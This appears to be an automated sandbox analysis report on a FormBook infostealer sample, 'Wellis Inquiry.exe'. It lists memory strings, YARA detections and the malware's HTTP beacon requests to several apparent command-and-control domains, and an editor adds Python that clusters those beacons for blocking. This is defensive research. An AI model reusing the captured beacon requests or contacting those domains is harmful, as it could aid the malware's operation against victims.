Source: Wellis Inquiry.exe, 00000000.00000003.658175918.000000000633C000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.com/
Source: Wellis Inquiry.exe, 00000000.00000003.658175918.000000000633C000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comf
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: Wellis Inquiry.exe, 00000000.00000003.658175918.000000000633C000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comtal
Source: Wellis Inquiry.exe, 00000000.00000003.658175918.000000000633C000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comw.m
Source: Wellis Inquiry.exe, 00000000.00000002.673404245.00000000081A0000.00000004.00020000.sdmp | String found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: Wellis Inquiry.exe, 00000000.00000002.672511476.0000000006330000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comion
Source: Wellis Inquiry.exe, 00000000.00000002.672511476.0000000006330000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.como
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: Wellis Inquiry.exe, 00000000.00000003.659186250.0000000006334000.00000004.00000001.sdmp, Wellis Inquiry.exe, 00000000.00000003.659071283.0000000006334000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Wellis Inquiry.exe, 00000000.00000003.658906835.0000000006334000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/(
Source: Wellis Inquiry.exe, 00000000.00000003.658906835.0000000006334000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/G
Source: Wellis Inquiry.exe, 00000000.00000003.658906835.0000000006334000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/Y03
Source: Wellis Inquiry.exe, 00000000.00000003.659186250.0000000006334000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/a-e
Source: Wellis Inquiry.exe, 00000000.00000003.658754582.0000000006334000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/i
Source: Wellis Inquiry.exe, 00000000.00000003.659186250.0000000006334000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/ita
Source: Wellis Inquiry.exe, 00000000.00000003.659186250.0000000006334000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: Wellis Inquiry.exe, 00000000.00000003.659186250.0000000006334000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/G
Source: Wellis Inquiry.exe, 00000000.00000003.658906835.0000000006334000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/i
Source: Wellis Inquiry.exe, 00000000.00000003.658906835.0000000006334000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/r
Source: Wellis Inquiry.exe, 00000000.00000003.658906835.0000000006334000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/tu
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: Wellis Inquiry.exe, 00000000.00000003.659186250.0000000006334000.00000004.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: Wellis Inquiry.exe, 00000000.00000003.659186250.0000000006334000.00000004.00000001.sdmp | String found in binary or memory: http://www.sakkal.com3
Source: Wellis Inquiry.exe, 00000000.00000003.659186250.0000000006334000.00000004.00000001.sdmp | String found in binary or memory: http://www.sakkal.comd
Source: Wellis Inquiry.exe, 00000000.00000003.656690322.000000000633A000.00000004.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: Wellis Inquiry.exe, 00000000.00000003.656404711.000000000634B000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.com51
Source: Wellis Inquiry.exe, 00000000.00000003.656404711.000000000634B000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.comy
Source: Wellis Inquiry.exe, 00000000.00000003.655923750.000000000634B000.00000004.00000001.sdmp | String found in binary or memory: http://www.typography.net
Source: Wellis Inquiry.exe, 00000000.00000003.655882162.000000000634B000.00000004.00000001.sdmp | String found in binary or memory: http://www.typography.net4?
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp | String found in binary or memory: http://www.typography.netD
          Source: Wellis Inquiry.exe, 00000000.00000003.655923750.000000000634B000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.neth?
          Source: Wellis Inquiry.exe, 00000000.00000003.655923750.000000000634B000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netiv
          Source: Wellis Inquiry.exe, 00000000.00000003.655923750.000000000634B000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netrz
          Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: cmmon32.exe, 0000000B.00000002.923291558.0000000004D62000.00000004.00020000.sdmpString found in binary or memory: https://bitninja.io
          Source: unknownDNS traffic detected: queries for: www.marunouchi1.com
          Source: global trafficHTTP traffic detected: GET /ag9v/?9rq=RZxJGV19NODz6/sPl50rcsjPCmhff0B2cQNSD9XNHlzuAkz3tWy1tz3gnsv2II3OKfXw&BFQ=5jI0jhMHA0hx_ HTTP/1.1Host: www.marunouchi1.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ag9v/?9rq=B7neoLnMPG5T4Lq1mgXXW304ryc0TDTB8h8f/WhOEZEEcWgrsd/ecy8wgWRxVB11aSvz&BFQ=5jI0jhMHA0hx_ HTTP/1.1Host: www.psychedeliccosmetics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ag9v/?9rq=8aghxAEFV3UFLmLUmwXrjnry4I8PGHpXxFVOvh2n7b9U9R7NlIya57CFUx9pJqwzlAw7&BFQ=5jI0jhMHA0hx_ HTTP/1.1Host: www.aceserial.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ag9v/?9rq=VDs0Hn8x6Kri7C1Uc2aKLXPFP0feJseWm2OJ8K++Wp+sqWdpvRON2LvjpBxhi0u2NedX&BFQ=5jI0jhMHA0hx_ HTTP/1.1Host: www.ebookgratis.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ag9v/?9rq=vpuErUH2OwLAPGAltxg3/Zj6XscnxJenLEapnG3NwgRlKVIYyl0HnfsKneQfORBHqYbR&BFQ=5jI0jhMHA0hx_ HTTP/1.1Host: www.ovmfinacial.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ag9v/?9rq=K9/CDnPG5wdyl4CHzmgShg3gLBJ4YNT1Y6jAhZ/FXp8/egWH1BEUOuCtjJEICRxztW+Z&BFQ=5jI0jhMHA0hx_ HTTP/1.1Host: www.dollpartyla.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
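The six GET requests above share one path (/ag9v/), two query parameters, a per-request value in the first parameter and an identical value in the second (BFQ=5jI0jhMHA0hx_), no User-Agent, and Connection: close, while the Host changes every time. FormBook rotates through a list of candidate domains from its configuration, so any single host is a weak indicator; the request shape shared across hosts is the durable one. The following Python is an added example by the editor, not part of the report or of any Joe Sandbox tooling: it parses the six request lines copied from this report (request line and headers joined with " | ", because the report prints them run together), checks each against a beacon-shape heuristic that is the editor's assumption (short alphanumeric directory path, exactly two parameters, no User-Agent, Connection: close), and clusters the hosts by path, parameter names and the constant trailing value.

```python
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

# Requests copied from this report's "HTTP traffic detected" rows; the " | "
# separators between request line and headers are the editor's.
REQUESTS: List[str] = [
    "GET /ag9v/?9rq=RZxJGV19NODz6/sPl50rcsjPCmhff0B2cQNSD9XNHlzuAkz3tWy1tz3gnsv2II3OKfXw&BFQ=5jI0jhMHA0hx_ HTTP/1.1 | Host: www.marunouchi1.com | Connection: close",
    "GET /ag9v/?9rq=B7neoLnMPG5T4Lq1mgXXW304ryc0TDTB8h8f/WhOEZEEcWgrsd/ecy8wgWRxVB11aSvz&BFQ=5jI0jhMHA0hx_ HTTP/1.1 | Host: www.psychedeliccosmetics.com | Connection: close",
    "GET /ag9v/?9rq=8aghxAEFV3UFLmLUmwXrjnry4I8PGHpXxFVOvh2n7b9U9R7NlIya57CFUx9pJqwzlAw7&BFQ=5jI0jhMHA0hx_ HTTP/1.1 | Host: www.aceserial.xyz | Connection: close",
    "GET /ag9v/?9rq=VDs0Hn8x6Kri7C1Uc2aKLXPFP0feJseWm2OJ8K++Wp+sqWdpvRON2LvjpBxhi0u2NedX&BFQ=5jI0jhMHA0hx_ HTTP/1.1 | Host: www.ebookgratis.online | Connection: close",
    "GET /ag9v/?9rq=vpuErUH2OwLAPGAltxg3/Zj6XscnxJenLEapnG3NwgRlKVIYyl0HnfsKneQfORBHqYbR&BFQ=5jI0jhMHA0hx_ HTTP/1.1 | Host: www.ovmfinacial.com | Connection: close",
    "GET /ag9v/?9rq=K9/CDnPG5wdyl4CHzmgShg3gLBJ4YNT1Y6jAhZ/FXp8/egWH1BEUOuCtjJEICRxztW+Z&BFQ=5jI0jhMHA0hx_ HTTP/1.1 | Host: www.dollpartyla.com | Connection: close",
]

REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+)\s+(?P<target>\S+)\s+HTTP/1\.[01]$")
# Editor's assumption for the beacon shape: a single short alphanumeric
# directory such as /ag9v/ and nothing else in the path.
PATH_SHAPE = re.compile(r"^/[A-Za-z0-9]{2,8}/$")


def parse_request(raw: str) -> Optional[Dict]:
    """Parse 'request line | Header: value | ...' into a dict; None if malformed."""
    parts = [p.strip() for p in raw.split(" | ")]
    m = REQUEST_LINE.match(parts[0])
    if not m:
        return None
    headers: Dict[str, str] = {}
    for part in parts[1:]:
        if ":" not in part:
            return None
        name, value = part.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    path, _, query = m.group("target").partition("?")
    params: Dict[str, str] = {}
    for kv in (query.split("&") if query else []):
        key, _, value = kv.partition("=")
        params[key] = value  # kept verbatim: '+' and '/' are part of the token, not encoding
    return {"method": m.group("method"), "path": path, "params": params,
            "host": headers.get("host", ""), "headers": headers}


def is_formbook_like(req: Dict) -> bool:
    """Shape heuristic (editor's assumption): GET, short directory path, two
    parameters, no User-Agent, Connection: close."""
    return (req["method"] == "GET"
            and PATH_SHAPE.match(req["path"]) is not None
            and len(req["params"]) == 2
            and "user-agent" not in req["headers"]
            and req["headers"].get("connection", "").lower() == "close")


def beacon_key(req: Dict) -> Tuple[str, Tuple[str, ...], str]:
    """Cluster key: path, parameter names in order, value of the last parameter.
    The first parameter carries per-request data and is deliberately left out."""
    names = tuple(req["params"])
    tail = req["params"][names[-1]] if names else ""
    return (req["path"], names, tail)


def cluster_beacons(raws: List[str]) -> Dict[Tuple[str, Tuple[str, ...], str], List[str]]:
    """Group the Host of every beacon-shaped request under its beacon key."""
    groups: Dict[Tuple[str, Tuple[str, ...], str], List[str]] = defaultdict(list)
    for raw in raws:
        req = parse_request(raw)
        if req is not None and is_formbook_like(req):
            groups[beacon_key(req)].append(req["host"])
    return dict(groups)


if __name__ == "__main__":
    for key, hosts in cluster_beacons(REQUESTS).items():
        print(key, "->", len(hosts), "hosts:", ", ".join(hosts))
```

Run on the report's six requests, the clustering yields one key, ("/ag9v/", ("9rq", "BFQ"), "5jI0jhMHA0hx_"), with all six hosts under it; a block on that key catches the whole rotation, whereas a block on www.marunouchi1.com alone catches one sixth of it.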

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 3.2.Wellis Inquiry.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.2.Wellis Inquiry.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.Wellis Inquiry.exe.44b68c0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.Wellis Inquiry.exe.446c2a0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000000.699912453.000000000E4B9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000002.921975794.0000000000360000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000002.922486626.0000000002C20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.745670982.0000000000C10000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.671146888.0000000004349000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 3.2.Wellis Inquiry.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.Wellis Inquiry.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.Wellis Inquiry.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.Wellis Inquiry.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Wellis Inquiry.exe.44b68c0.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Wellis Inquiry.exe.44b68c0.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Wellis Inquiry.exe.446c2a0.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Wellis Inquiry.exe.446c2a0.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.699912453.000000000E4B9000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.699912453.000000000E4B9000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.921975794.0000000000360000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.921975794.0000000000360000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.922486626.0000000002C20000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.922486626.0000000002C20000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.745670982.0000000000C10000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.745670982.0000000000C10000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.671146888.0000000004349000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.671146888.0000000004349000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Wellis Inquiry.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 3.2.Wellis Inquiry.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.Wellis Inquiry.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.Wellis Inquiry.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.Wellis Inquiry.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Wellis Inquiry.exe.44b68c0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Wellis Inquiry.exe.44b68c0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Wellis Inquiry.exe.446c2a0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Wellis Inquiry.exe.446c2a0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.699912453.000000000E4B9000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.699912453.000000000E4B9000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.921975794.0000000000360000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.921975794.0000000000360000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.922486626.0000000002C20000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.922486626.0000000002C20000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.745670982.0000000000C10000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.745670982.0000000000C10000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.671146888.0000000004349000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.671146888.0000000004349000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 0_2_0176E9D0
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 0_2_0176C9DC
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 0_2_0176E9C0
